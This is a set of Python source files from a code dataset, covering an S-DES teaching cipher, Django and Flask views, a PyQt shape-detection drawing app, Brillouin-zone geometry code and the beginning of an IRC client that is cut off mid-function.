:\",subkey)\n def F(R, subkey):\n print(\" | [F(R,S)] Entering F with R:\", R, \"and subkey :\",subkey)\n if len(R) == 4:\n #eR = expander(R)\n #print(\" | expander(R) :\",eR)\n eR = R\n p = [\n [str(int(R[3]) ^ int(subkey[0])), str(int(R[0]) ^ int(subkey[1])), str(int(R[1]) ^ int(subkey[2])), str(int(R[2]) ^ int(subkey[3]))],\n [str(int(R[1]) ^ int(subkey[4])), str(int(R[2]) ^ int(subkey[5])), str(int(R[3]) ^ int(subkey[6])), str(int(R[0]) ^ int(subkey[7]))]\n ]\n sb1 = sbox1(p[0][0], p[0][1], p[0][2], p[0][3])\n sb2 = sbox2(p[1][0], p[1][1], p[1][2], p[1][3])\n print(\" | sbox1(\",','.join([p[0][0], p[0][1], p[0][2], p[0][3]]),\") : \",sb1, sep = \"\")\n print(\" | sbox2(\",','.join([p[1][0], p[1][1], p[1][2], p[1][3]]),\") : \",sb2, sep = \"\")\n out = p4(sb1 + sb2)\n #out = p4(sbox1(p[0][0], p[0][1], p[0][2], p[0][3]) + sbox2(p[1][0], p[1][1], p[1][2], p[1][3]))\n print(\" | [F(R,S)] Leaving F returning data :\",out)\n return out\n return None\n def ors(a, b):\n print(\" | [ORS ] Entering ors with a:\", a, \"and b :\",b)\n if len(a) == len(b):\n output = ''.join([str(int(a[k]) ^ int(b[k])) for k in range(len(a))]) # ^ = xor\n print(\" | [ORS ] Leaving ors with output:\", output)\n return output\n return None\n if len(data) == 8:\n L = data[:int(len(data)/2)]\n R = data[int(len(data)/2):]\n print(\" | ors(L,F(R, subkey)) + R =\",ors(L,F(R, subkey)),\"+\",R)\n out = ors(L,F(R, subkey)) + R #none : F(R, subkey)\n print(\"[ fk ] Leaving fk returning data :\",out)\n return out\n return None\n\n##----------------------------------------------------------------------- switch * OK\n\ndef switch(data, verbose = False):\n if verbose:\n print(\"[ SW ] Entering switch with data :\", data)\n if len(data) == 8:\n if verbose:\n print(\"[ SW ] Leaving switch with data :\", data[int(len(data)/2):] + data[:int(len(data)/2)])\n return data[int(len(data)/2):] + data[:int(len(data)/2)]\n return None\n\n##------------------------------------------------------------------------- SDES * OK\n\ndef SDES_encrypt(message, key):\n subkey1, subkey2 = keygen(key)\n buffer = initial_permutation(message)\n buffer = fk(buffer, subkey1)\n buffer = switch(buffer)\n buffer = fk(buffer, subkey2)\n cipher = initial_permutation_reverse(buffer)\n return cipher\n\ndef SDES_decrypt(cipher, key):\n subkey1, subkey2 = keygen(key)\n buffer = initial_permutation_reverse(cipher)\n buffer = fk(buffer, subkey2)\n buffer = switch(buffer)\n buffer = fk(buffer, subkey1)\n message = initial_permutation(buffer)\n return message\n\nif __name__ == \"\"\"__main__\"\"\":\n #print(SDES_encrypt(\"10101010\", \"0000000000\"))\n #assert(SDES_encrypt(\"10101010\", \"0000000000\") == \"00010001\")\n\n #print(SDES_encrypt(\"10101010\", \"1110001110\"))\n assert(SDES_encrypt(\"10101010\", \"1110001110\") == \"11001010\")\n\n #print(SDES_encrypt(\"01010101\", \"1110001110\"))\n assert(SDES_encrypt(\"01010101\", \"1110001110\") == \"01110000\")\n\n #print(SDES_encrypt(\"10101010\", \"1111111111\"))\n assert(SDES_encrypt(\"10101010\", \"1111111111\") == \"00000100\")\n","sub_path":"lib/allinone.py","file_name":"allinone.py","file_ext":"py","file_size_in_byte":6834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"581836124","text":"try:\n from django.utils.deprecation import MiddlewareMixin\nexcept ImportError:\n MiddlewareMixin = object\n \n\ndef get_page(self, suffix):\n \"\"\"\n A function which will be monkeypatched onto the request to get the current\n integer representing the current page.\n \"\"\"\n try:\n page_key = 'page%s' % suffix\n get = self.GET\n if page_key in get:\n page = get[page_key]\n else:\n post = self.POST\n if page_key in post:\n page = post[page_key]\n else:\n return 1\n return int(page)\n except (AttributeError, KeyError, ValueError, TypeError):\n return 1\n\nclass PaginationMiddleware(MiddlewareMixin):\n \"\"\"\n Inserts a variable representing the current page onto the request object if\n it exists in either **GET** or **POST** portions of the request.\n \"\"\"\n def process_request(self, request):\n request.__class__.page = get_page\n","sub_path":"pagination/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"505225987","text":"import logging\nimport inspect\n\nlog = logging.getLogger(__name__)\n\n\nasync def run_awaitable_factory(factory, *args, **kw):\n result = factory(*args, **kw)\n if inspect.isawaitable(result):\n return (await result)\n else:\n return result\n","sub_path":"hyperapp/async/async_registry.dyn.py","file_name":"async_registry.dyn.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"238527615","text":"from PyQt5.QtWidgets import QApplication, QMainWindow, QPushButton\nfrom PyQt5.QtGui import QPainter, QPen, QColor, QImage\nimport sys\nimport enum\nimport cv2\nimport numpy as np\n\nOPENCV_VERSION = cv2.__version__.split(\".\")[0]\n\nclass ShapeDetector:\n def __init__(self):\n pass\n\n def detect(self, c):\n peri = cv2.arcLength(c, True)\n approx = cv2.approxPolyDP(c, 0.04 * peri, True)\n alen = len(approx)\n if alen == 3:\n return \"triangle\"\n elif alen == 4:\n return \"square\"\n elif alen == 5:\n return \"pentagon\"\n elif alen > 5:\n return \"circle\"\n else:\n return \"unknown\"\n\n\nclass State(enum.Enum):\n SHOW = 0\n DRAW = 1\n\n\nclass Window(QMainWindow):\n def __init__(self):\n super().__init__()\n self.title = \"Assisted drawing\"\n self.r, self.g, self.b = 0, 0, 0\n self.top = 100\n self.left = 150\n self.width = 500\n self.height = 500\n self.last_x = None\n self.last_y = None\n self.state = State.SHOW\n self.initWindow()\n self.overlayImage = QImage(self.width, self.height, QImage.Format_ARGB32)\n self.mainImage = QImage(self.width, self.height, QImage.Format_RGB32)\n self.drawShape()\n\n def initWindow(self):\n self.setWindowTitle(self.title)\n self.setGeometry(self.top, self.left, self.width, self.height)\n\n self.printButtonRed()\n self.printButtonBlue()\n self.printButtonGreen()\n self.b1.clicked.connect(self.red_color)\n self.b2.clicked.connect(self.blue_color)\n self.b3.clicked.connect(self.green_color)\n\n self.show()\n\n def printButtonRed(self):\n self.b1 = QPushButton(self)\n self.b1.resize(25,25)\n self.b1.move(self.width - 25, self.height - 25)\n self.b1.setStyleSheet(\"background-color: red\")\n\n def printButtonBlue(self):\n self.b2 = QPushButton(self)\n self.b2.resize(25,25)\n self.b2.move(self.width - 25, self.height - 50)\n self.b2.setStyleSheet(\"background-color: blue\")\n\n def printButtonGreen(self):\n self.b3 = QPushButton(self)\n self.b3.resize(25,25)\n self.b3.move(self.width - 25, self. height - 75)\n self.b3.setStyleSheet(\"background-color: green\")\n\n def red_color(self):\n self.r = 200\n self.g = 0\n self.b = 0\n print('red')\n\n def blue_color(self):\n self.r = 0\n self.g = 0\n self.b = 200\n print('blue')\n\n def green_color(self):\n self.r = 0\n self.g = 200\n self.b = 0\n print('green')\n\n def drawShape(self):\n painter = QPainter()\n painter.begin(self.overlayImage)\n pen = QPen()\n pen.setWidth(8)\n pen.setColor(QColor(0, 255, 0))\n painter.setPen(pen)\n painter.fillRect(self.rect(), QColor(0, 0, 0))\n painter.end()\n\n def mouseMoveEvent(self, event):\n print(\"x: \" + str(event.x()) + \"; y: \" + str(event.y()))\n if self.last_x is None:\n self.last_x = event.x()\n self.last_y = event.y()\n return\n\n painter = QPainter(self.overlayImage)\n pen = QPen()\n pen.setWidth(8)\n pen.setColor(QColor(self.r, self.g, self.b))\n painter.setPen(pen)\n painter.drawLine(self.last_x, self.last_y, event.x(), event.y())\n painter.end()\n self.update()\n self.last_x = event.x()\n self.last_y = event.y()\n self.repaint()\n\n def mousePressEvent(self, event):\n self.last_x = event.x()\n self.last_y = event.y()\n self.state = State.DRAW\n\n def mouseReleaseEvent(self, event):\n img = self.qImageToMat(self.overlayImage)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n blurred = cv2.GaussianBlur(gray, (5, 5), 0)\n thresh = cv2.threshold(blurred, 60, 255, cv2.THRESH_BINARY)[1]\n if OPENCV_VERSION == \"3\":\n image, contours, hier = cv2.findContours(thresh.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n elif OPENCV_VERSION == \"4\":\n contours, hier = cv2.findContours(thresh.copy(), cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)\n else:\n raise Exception(\"Unsupported OpenCV version: \" + str(OPENCV_VERSION))\n sd = ShapeDetector()\n for c in contours:\n shape = sd.detect(c)\n if shape == \"unknown\":\n continue\n m = cv2.moments(c)\n if m[\"m00\"] == 0.0:\n continue\n print(m)\n cx = int(m[\"m10\"] / m[\"m00\"])\n cy = int(m[\"m01\"] / m[\"m00\"])\n cv2.drawContours(img, [c], -1, (0, 255, 0), 2)\n cv2.putText(img, shape, (cx, cy), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)\n\n height, width, channel = img.shape\n self.mainImage = QImage(img.data, width, height, img.strides[0], QImage.Format_ARGB32)\n self.state = State.SHOW\n self.repaint()\n\n def qImageToMat(self, img):\n img = img.convertToFormat(QImage.Format_RGB32)\n width = img.width()\n height = img.height()\n ptr = img.bits()\n ptr.setsize(img.byteCount())\n arr = np.array(ptr).reshape(height, width, 4)\n return arr\n\n def paintEvent(self, event):\n painter = QPainter()\n painter.begin(self)\n\n if self.state == State.SHOW:\n painter.drawImage(0, 0, self.mainImage)\n else:\n painter.drawImage(0, 0, self.overlayImage)\n\n painter.end()\n\ndef main(argv):\n app = QApplication(argv)\n window = Window()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"SAC-detect.py","file_name":"SAC-detect.py","file_ext":"py","file_size_in_byte":5699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"604383883","text":"# -*- coding: utf-8 -*-\nfrom flask import Blueprint, request, render_template\nfrom flask.ext.login import login_required\nfrom .models import CronTab, Kv\n\n\nmod = Blueprint('admin', __name__, template_folder='templates')\n\n\n@mod.route('/crontab', methods=['GET', 'POST'])\n@login_required\ndef crontab():\n if (request.method == 'POST'):\n uuid = request.form.get('uuid')\n name = request.form.get('name')\n interval = request.form.get('interval')\n\n CronTab.update(uuid, name, interval)\n\n cronjobs = CronTab.all()\n context = {'cronjobs': cronjobs}\n return render_template('admin/crontab.html', **context)\n else:\n cronjobs = CronTab.all()\n context = {'cronjobs': cronjobs}\n return render_template('admin/crontab.html', **context)\n\n\n@mod.route('/kv', methods=['GET', 'POST'])\n@login_required\ndef kv():\n if (request.method == 'POST'):\n name = request.form.get('n')\n value = request.form.get('v')\n\n Kv.set(name, value)\n\n kvs = Kv.all()\n\n context = {'kvs': kvs}\n return render_template('admin/kv.html', **context)\n else:\n kvs = Kv.all()\n\n context = {'kvs': kvs}\n return render_template('admin/kv.html', **context)\n","sub_path":"appl/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"239795042","text":"from django.template.defaultfilters import register\n\n@register.filter\ndef getSetFromManyToOneRelationship(_object, setName):\n \"\"\"\n Returns the object's set with the specified name.\n \"\"\"\n _set = getattr(_object, setName)\n return _set.all()\n\n@register.filter\ndef calculateTotalOrderPrice(order):\n \"\"\"\n Calculates the total order price.\n \"\"\"\n orderElements = order.orderelement_set.all()\n sum = 0\n for orderElement in orderElements:\n sum = sum + (orderElement.product.Price * orderElement.quantity)\n\n return sum\n \n ","sub_path":"order/templatetags/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"153266362","text":"# Copyright (c) 2013 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the 'License'); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an 'AS IS' BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\nimport json\nfrom flask import Flask, jsonify, request, abort, send_from_directory\nfrom werkzeug import secure_filename\n\n\napp = Flask(__name__)\nhosts = {}\n\n\ndef save_config():\n with open('server.conf', 'w') as config_file:\n json.dump(hosts, config_file)\n\n\ndef read_config():\n global hosts\n with open('server.conf', 'r') as config_file:\n hosts = json.load(config_file)\n\n\n@app.route('/hosts', methods=['GET'])\ndef get_list_of_hosts():\n return jsonify({'hosts': hosts})\n\n\n@app.route('/hosts', methods=['POST'])\ndef add_host():\n data = json.loads(request.data)\n\n if not 'host_name' in data or not 'ip' in data:\n abort(403)\n\n hosts.update({data['host_name']: {'ip': data['ip'],\n 'files': []}})\n save_config()\n\n return jsonify({'hosts': hosts}), 201\n\n\n@app.route('/hosts/', methods=['GET'])\ndef get_host(host_name):\n if not host_name in hosts:\n abort(404)\n\n return jsonify({'host': hosts[host_name]})\n\n\n@app.route('/hosts/', methods=['DELETE'])\ndef delete_host(host_name):\n if not host_name in hosts:\n abort(404)\n\n del hosts[host_name]\n save_config()\n\n return 'OK', 200\n\n\n@app.route('/hosts//files', methods=['POST'])\ndef add_file(host_name):\n if not host_name in hosts:\n abort(404)\n\n for param, file_ in request.files:\n if not file_name in hosts[host_name]['files']:\n hosts[host_name]['files'].append(file_.filename)\n\n directory = os.path.join('/var/monitor/files', host_name)\n\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n full_name = os.path.join(directory, secure_filename(file_.filename))\n file_.save(full_name)\n\n save_config()\n\n return jsonify({'host': hosts[host_name]})\n\n\n@app.route('/hosts//files/',\n methods=['GET'])\ndef get_file(host_name, file_name):\n\n if not host_name in hosts:\n return \"Host does not exist\", 404\n\n if not file_name in hosts[host_name]['files']:\n return \"File does not exist\", 404\n\n path = os.path.join('/var/monitor/files', host_name)\n return send_from_directory(path, file_name)\n\n\nif __name__ == '__main__':\n read_config()\n app.run(debug=True, port=7007)\n","sub_path":"infra/deployment_monitor.py","file_name":"deployment_monitor.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"239021632","text":"import itertools\nfrom dataclasses import dataclass, field\nfrom typing import List, Optional, Tuple\n\nimport numpy as np\nfrom monty.json import MSONable\nfrom scipy.spatial import ConvexHull, Voronoi\nfrom trimesh.geometry import plane_transform\nfrom trimesh.intersections import plane_lines\nfrom trimesh.transformations import transform_points\n\nfrom pymatgen import Structure\n\n\n@dataclass\nclass ReciprocalSlice(MSONable):\n \"\"\"\n A slice along a pane in reciprocal space.\n\n Args:\n reciprocal_space: The reciprocal space that the slice belongs to.\n vertices: The vertices as 2D coordinates for the intersection of the plane with\n the Brillouin zone boundaries.\n transformation: The transformation that maps points in the 3D Brillouin zone\n to points on the reciprocal slice.\n \"\"\"\n\n reciprocal_space: \"ReciprocalCell\"\n vertices: np.ndarray\n transformation: np.ndarray\n _edges: Optional[List[Tuple[int, int]]] = field(default=None, init=False)\n\n @property\n def edges(self) -> List[Tuple[int, int]]:\n \"\"\"\n Get the edges of the space as a List of tuples specifying the vertex indices.\n \"\"\"\n if self._edges is None:\n hull = ConvexHull(self.vertices)\n self._edges = hull.simplices\n return self._edges\n\n @property\n def lines(self) -> np.ndarray:\n \"\"\"\n Get the lines defining the space as a list of two coordinates.\n \"\"\"\n return self.vertices[np.array(self.edges)]\n\n\n@dataclass\nclass ReciprocalCell(MSONable):\n \"\"\"\n A parallelepiped reciprocal lattice cell.\n\n Args:\n reciprocal_lattice: The reciprocal lattice vectors.\n vertices: The vertices of the Brillouin zone edges as an array with shape\n ``(n_vertices, 3)``.\n faces: The faces of the reciprocal cell given as in terms of vertex indices as\n a list with shape ``(n_faces, n_vertices_in_face)``.\n \"\"\"\n\n reciprocal_lattice: np.ndarray\n vertices: np.ndarray\n faces: List[List[int]]\n _edges: Optional[List[Tuple[int, int]]] = field(default=None, init=False)\n\n @classmethod\n def from_structure(cls, structure: Structure) -> \"ReciprocalCell\":\n \"\"\"\n Initialise the reciprocal cell from a structure.\n\n Args:\n structure: A structure.\n\n Returns:\n An instance of the class.\n \"\"\"\n reciprocal_lattice = structure.lattice.reciprocal_lattice.matrix\n vertices = [\n [0, 0, 0], # 0\n [0, 0, 1], # 1\n [0, 1, 0], # 2\n [0, 1, 1], # 3\n [1, 0, 0], # 4\n [1, 0, 1], # 5\n [1, 1, 0], # 6\n [1, 1, 1], # 7\n ]\n faces = [\n [0, 1, 3, 2],\n [4, 5, 7, 6],\n [0, 1, 5, 4],\n [2, 3, 7, 6],\n [0, 4, 6, 2],\n [1, 5, 7, 3],\n ]\n vertices = np.dot(np.array(vertices) - 0.5, reciprocal_lattice)\n return cls(reciprocal_lattice, vertices, faces)\n\n @property\n def edges(self) -> List[Tuple[int, int]]:\n \"\"\"\n Get the edges of the space as a List of tuples specifying the vertex indices.\n \"\"\"\n if self._edges is None:\n output = set()\n for face in self.faces:\n for i in range(len(face)):\n edge = tuple(sorted([face[i], face[i - 1]]))\n output.add(edge)\n self._edges = list(set(output))\n return self._edges\n\n @property\n def lines(self) -> np.ndarray:\n \"\"\"\n Get the lines defining the space as a list of two coordinates.\n \"\"\"\n return self.vertices[np.array(self.edges)]\n\n def get_reciprocal_slice(\n self, plane_normal: Tuple[int, int, int], distance: float = 0\n ) -> ReciprocalSlice:\n \"\"\"\n Get a reciprocal slice through the Brillouin zone, defined by the intersection\n of a plane with the lattice.\n\n Args:\n plane_normal: The plane normal in fractional indices. E.g., ``(1, 0, 0)``.\n distance: The distance from the center of the Brillouin zone (the Gamma\n point).\n\n Returns:\n The reciprocal slice.\n \"\"\"\n cart_normal = np.dot(plane_normal, self.reciprocal_lattice)\n cart_center = cart_normal * distance\n\n # get the intersections with the faces\n intersections, _ = plane_lines(\n cart_center, cart_normal, self.lines.transpose(1, 0, 2)\n )\n\n if len(intersections) == 0:\n raise ValueError(\"Plane does not intersect reciprocal cell\")\n\n #  transform the intersections from 3D space to 2D coordinates\n transformation = plane_transform(origin=cart_center, normal=cart_normal)\n points = transform_points(intersections, transformation)[:, :2]\n\n return ReciprocalSlice(self, points, transformation)\n\n\n@dataclass\nclass WignerSeitzCell(ReciprocalCell):\n \"\"\"\n The first Brillioun Zone information.\n\n This is the Wigner–Seitz cell of the reciprocal lattice.\n\n Args:\n reciprocal_lattice: The reciprocal lattice vectors.\n vertices: The vertices of the Brillouin zone edges as an array with shape\n ``(n_vertices, 3)``.\n faces: The faces of the reciprocal cell given as in terms of vertex indices as\n a list with shape ``(n_faces, n_vertices_in_face)``.\n centers: The centers of the faces with the shape ``(n_faces, 3)``.\n normals: The normal vectors to each face with the shape ``(n_faces, 3)``.\n \"\"\"\n\n centers: np.ndarray\n normals: np.ndarray\n\n @classmethod\n def from_structure(cls, structure: Structure) -> \"WignerSeitzCell\":\n \"\"\"\n Initialise the Wigner–Seitz cell from a structure.\n\n Args:\n structure: A structure.\n\n Returns:\n An instance of the cell.\n \"\"\"\n reciprocal_lattice = structure.lattice.reciprocal_lattice.matrix\n\n points = []\n for i, j, k in itertools.product([-1, 0, 1], [-1, 0, 1], [-1, 0, 1]):\n points.append(np.dot([i, j, k], reciprocal_lattice))\n\n voronoi = Voronoi(points)\n\n #  find the bounded voronoi region vertices\n valid_vertices = set()\n for region in voronoi.regions:\n if -1 not in region:\n valid_vertices.update(region)\n\n # get the faces as the ridges that comprise the bounded region\n faces = [x for x in voronoi.ridge_vertices if set(x).issubset(valid_vertices)]\n vertices = voronoi.vertices\n\n # get the center normals for all faces\n centers = []\n normals = []\n for face in faces:\n face_verts = vertices[face]\n center = face_verts.mean(axis=0)\n\n v1 = face_verts[0] - center\n for v2 in face_verts[1:]:\n normal = np.cross(v1, v2 - center)\n if not np.allclose(normal, 0.0):\n break\n\n if np.dot(center, normal) < 0.0:\n normal = -normal\n\n centers.append(center)\n normals.append(normal)\n\n centers = np.array(centers)\n normals = np.array(normals)\n return cls(reciprocal_lattice, vertices, faces, centers, normals)\n","sub_path":"ifermi/brillouin_zone.py","file_name":"brillouin_zone.py","file_ext":"py","file_size_in_byte":7308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"351125276","text":"from system.oie import OIE\r\n\r\noie = OIE()\r\n# test one data\r\nline = {\"text\": \"印度空军参谋长阿尔琼也提防巴空军的“决定性行动”,并且他致电帕赞科特基地司令苏里上校\"}\r\nline = {\"text\": \"中美两国的人民反对大规模的杀伤性的武器\"}\r\nline = {\"id\": \"6\", \"sysId\": \"eb88374b30fda925b399e787a927327c\", \"text\": \"13日,冲绳和平运动中心组织了2800名冲绳县民,到驻冲绳美军普天间基地周边举行抗议集会。\", \"event_list\": [{\"event_type\": \"举办类\", \"trigger\": \"举行\", \"trigger_start_index\": \"38\", \"trigger_end_index\": \"40\", \"trigger_entity_type\": \"NONE\", \"arguments\": [{\"role\": \"会议\", \"argument\": \"抗议集会\", \"argument_start_index\": \"40\", \"argument_end_index\": \"44\", \"argument_entity_type\": \"Meeting\"}, {\"role\": \"地点\", \"argument\": \"普天间基地\", \"argument_start_index\": \"31\", \"argument_end_index\": \"36\", \"argument_entity_type\": \"ZBGC\"}, {\"role\": \"时间\", \"argument\": \"13日\", \"argument_start_index\": \"0\", \"argument_end_index\": \"3\", \"argument_entity_type\": \"Time\"}, {\"role\": \"主体\", \"argument\": \"冲绳和平运动中心\", \"argument_start_index\": \"4\", \"argument_end_index\": \"12\", \"argument_entity_type\": \"Org\"}]}]}\r\nsample = line\r\nresult, quick_look = oie.extract(sample, True, True, True)\r\nprint(result)\r\n# s += len(result)\r\n# opobj.write(str(result) + \"\\n\")\r\n# opobj2.write(str(quick_look) + \"\\n\")\r\n# print(s)\r\n# opobj.close()\r\n# opobj2.close()","sub_path":"examples/test_oie.py","file_name":"test_oie.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"164900304","text":"# MSG Mike Simpson\n# Phase III Networking I\n# Instructor: William Echlin\n# 24 June 2016\n\nimport socket\nimport select\nimport selectors\nimport threading\nimport sys\nimport re\nimport random\n\n# mentoring and review by Brook Eliason\n# logic and these functions modified with help/use of\n# github user dsprimm SPC Primm\n# https://github.com/dsprimm/thunderdome/blob/master/thunderdome.py\n\nclass status:\n def __init__(self):\n self.channel = None\n self.sock = None\n\ndef tokenize(str):\n var = re.search('^(\\s*\\S+)\\s*(.*)$', str)#entire string remove white space\n if var != None:\n return (var.group(1),var.group(2))#var.group(0) is whole string\n return None\n\nclass Server_Parse:\n output = []\n msg_from = None\n\n def get_output(self):\n return self.output.pop(0)\n\n def has_output(self):\n if len(self.output)==0:\n return False\n else:\n return True\n\n def _f_000(this, args):\n this.output.append(\"USER USER_1 127.0.0.1 UNIX-SERVER :UMBC\")\n this.output.append(\"NICK USER_1\")\n\n def _f_303(this, args):\n if args[-1:] == ':':\n print(\"User is not online\")\n else:\n print(\"User is online\")\n\n def _f_352(this, args):\n tokens = tokenize(args)\n tokens = tokenize(tokens[1])\n tokens = tokenize(tokens[1])\n tokens = tokenize(tokens[1])\n tokens = tokenize(tokens[1])\n tokens = tokenize(tokens[1])\n print(\"\\x1b[1;36m\" + tokens[0] + \"\\x1b[0m\")\n\n def _f_353(this, args):\n tokens = tokenize(args)\n tokens = tokenize(tokens[1])\n print(\"{353} \" + tokens[1])\n\n def _f_371(this, args):\n tokens = tokenize(args)\n print(\"\\t\" + tokens[1])\n\n\n def _f_433(this, args):\n print(\"Sucker that Nick in in use generating new NICK\")\n num = random.randrange(1, 100, 1)\n this.output.append(\"NICK USER_\" + str(num))\n\n def _f_join(this, args):\n print(\"\\x1b[1;31m\" + this.msg_from + \" has joined channel \" + args + \"\\x1b[0m\")\n\n def _f_mode(this, args):\n tokens = tokenize(args)\n tokens = tokenize(tokens[1])\n k_val = tokens[0]\n if k_val == \"-k\":\n print(\"\\x1b[1;36m\" + this.msg_from + \" has unset the channel key\\x1b[0m\")\n else:\n tokens = tokenize(tokens[1])\n print(\"\\x1b[1;36m\" + this.msg_from +\" has set the channel key \" + tokens[0] + \"\\x1b[0m\")\n\n def _f_nick(this, args):\n tokens = tokenize(args)\n if tokens is None or len(tokens[1]) > 0: # take nick from first element check for message\n print(\"Invalid NICK recieved please fix\")\n return\n print(\"\\x1b[1;33m%s is now known as %s\\x1b[0m\" % (this.msg_from, tokens[0]))\n\n def _f_notice(this, args):\n tokens = tokenize(args)\n if tokens is None or len(tokens[1]) == 0 or tokens[1][0] != \":\": # take nick from first element check for message\n print(\"Invalid msg recieved please fix\")\n return\n if tokens[0][0] == \"#\":\n print (\"%s[%s] %s\" % (tokens[0], this.msg_from, tokens[1][1:]))\n else:\n print(\"\\x1b[1;34m\" + \"NOTICE >>> %s: %s\\x1b[0m\" % (this.msg_from, tokens[1][1:]))\n\n def _f_part(this, args):\n tokens = tokenize(args)\n if tokens is None: # take nick from first element check for message\n print(\"Invalid PART recieved please fix\")\n return\n if len(tokens[1]) > 0:\n print(this.msg_from + \" has left channel \" + tokens[0] + \": \" + tokens[1][1:])\n else:\n print(this.msg_from + \" has left channel \" + tokens[0])\n\n def _f_pong(this, args):\n print(\"PING was successful\")\n\n def _f_privmsg(this, args):\n tokens = tokenize(args)\n if tokens is None or len(tokens[1]) == 0 or tokens[1][0] != \":\": # take nick from first element check for message\n print(\"Invalid msg recieved please fix\")\n return\n if tokens[0][0] == \"#\":\n var = re.search('^:\\001ACTION\\s+(.+)\\001', tokens[1]) # Action?\n if var != None:\n action = var.group(1)\n print(\"\\x1b[31m\" + this.msg_from + \" \" + action + \"\\x1b[0m\")\n else:\n print (\"%s[%s] %s\" % (tokens[0], this.msg_from, tokens[1][1:]))\n else:\n print(\"\\x1b[1;33m[PRIVMSG >>> %s: %s\\x1b[0m\" % (this.msg_from, tokens[1][1:]))\n\n def _f_quit(this, args):\n if args != \":EOT\":\n print(this.msg_from + \" QUIT irc\" + args)\n else:\n print(this.msg_from + \" QUIT irc\")\n\n def _f_topic(this, args):\n tokens = tokenize(args)\n print (\"\\x1b[32m\" + this.msg_from + \" has changed TOPIC in \" + tokens[0] + \" to '\" + tokens[1][1:] + \"'\\x1b[0m\")\n\n def parse(this, str):\n this.msg_from = None\n commands = {\n \"000\": this._f_000,\n \"303\": this._f_303,\n \"352\": this._f_352,#who #channel user list\n \"353\": this._f_353,#filter how users in channel display\n \"371\": this._f_371,#help/info list\n \"433\": this._f_433,\n \"JOIN\": this._f_join,\n \"MODE\": this._f_mode,\n \"NICK\": this._f_nick,\n \"NOTICE\": this._f_notice,\n \"PART\": this._f_part,\n \"PONG\": this._f_pong,\n \"PRIVMSG\": this._f_privmsg,\n \"QUIT\": this._f_quit,\n \"TOPIC\": this._f_topic,\n }\n\n ignore = {\n \"366\", \"315\", \"323\"\n }\n # handle 1st Token\n cmd = tokenize(str)\n if cmd == None:\n return\n if cmd[0]==\"PING\":\n this.output.append(\"PONG\")\n\n var = re.search('^:([^!]+)!', cmd[0]) # determine if msg is from a user\n if var != None:\n this.msg_from = var.group(1)\n\n # handle 2nd Token\n cmd = tokenize(cmd[1])\n if cmd == None:\n print(\"Help Help Help\")\n return\n\n if cmd[0] in commands.keys(): # everything other than the /\n if commands[cmd[0]] is not None:\n commands[cmd[0]](cmd[1])\n else:\n print(\"Sorry, command '%s' is not implemented yet\" % cmd[0])\n elif re.search('^\\d\\d\\d$', cmd[0]) is not None and cmd[0] not in ignore:\n cmd_val = (int)(cmd[0])\n tokens = tokenize( cmd[1])\n if tokens is not None and len(tokens[1]) > 0:\n print(\"{%s} %s\" %(cmd[0], tokens[1]))\n\n\n\nclass Parse:\n in_channel = None\n output = []\n dbg = False\n\n\n def get_output(self):\n return self.output.pop(0)\n def has_output(self):\n if len(self.output)==0:\n return False\n else:\n return True\n\n def away(this, cmd, args): # args is everything after session\n if len(args) > 0: # view TOPIC\n this.output.append(\"AWAY :AWAY \" + args)\n this.output.append(\"PRIVMSG #\" + this.in_channel + \" :\\x01ACTION is AWAY \" + args + \"\\x01\")\n else:# if len(tokens[0]) != 0: # view TOPIC\n this.output.append(\"AWAY\")\n this.output.append(\"PRIVMSG #\" + this.in_channel + \" :\\x01ACTION is no longer AWAY\\x01\")\n\n def debug(this, cmd, args):\n if this.dbg == True:\n this.dbg = False\n else:\n this.dbg = True\n print(\"Debug mode is %s\" % this.dbg)\n\n def emote(this, cmd, args): # args is everything after session\n if len(args) == 0: # take nick from first element check for message\n print(\"Invalid usage: /ME \")\n return\n this.output.append(\"PRIVMSG #\" + this.in_channel + \" :\\x01ACTION \" + args + \"\\x01\")\n\n\n def ison(this, cmd, args): # args is everything after session\n tokens = tokenize(args)\n if tokens is None or len(tokens[1]) > 0: # take nick from first element check for message\n print(\"Invalid usage: /ison \")\n return\n this.output.append(\"ISON \"+tokens[0])\n\n def join(this, cmd, args): # args is everything after session\n tokens = tokenize(args)\n\n if tokens is None or len(tokens[1]) > 0 or tokens[0][0]!= \"#\": # take nick from first element check for message\n print(\"Invalid usage: /JOIN #channel\")\n return\n if this.in_channel:\n this.output.append(\"PART #\" + this.in_channel)\n this.output.append(\"JOIN \"+tokens[0])\n this.in_channel = tokens[0][1:]\n print(\"Joining channel %s\" % (tokens[0]))\n\n def leave(this, cmd, args): # 